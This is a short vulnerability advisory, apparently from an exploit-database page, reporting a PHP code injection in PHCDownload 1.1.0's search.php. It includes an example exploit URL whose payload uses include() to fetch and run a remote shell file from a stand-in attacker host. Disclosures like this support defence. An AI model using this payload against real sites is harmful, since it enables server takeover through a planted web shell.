PHCDownload 1.1.0 Vulnerabilities

2009.02.21

Credit: vnbrain

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.
Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called.
Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>
Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>

References:

http://seclists.org/bugtraq/2009/Feb/0174.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHCDownload 1.1.0 Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.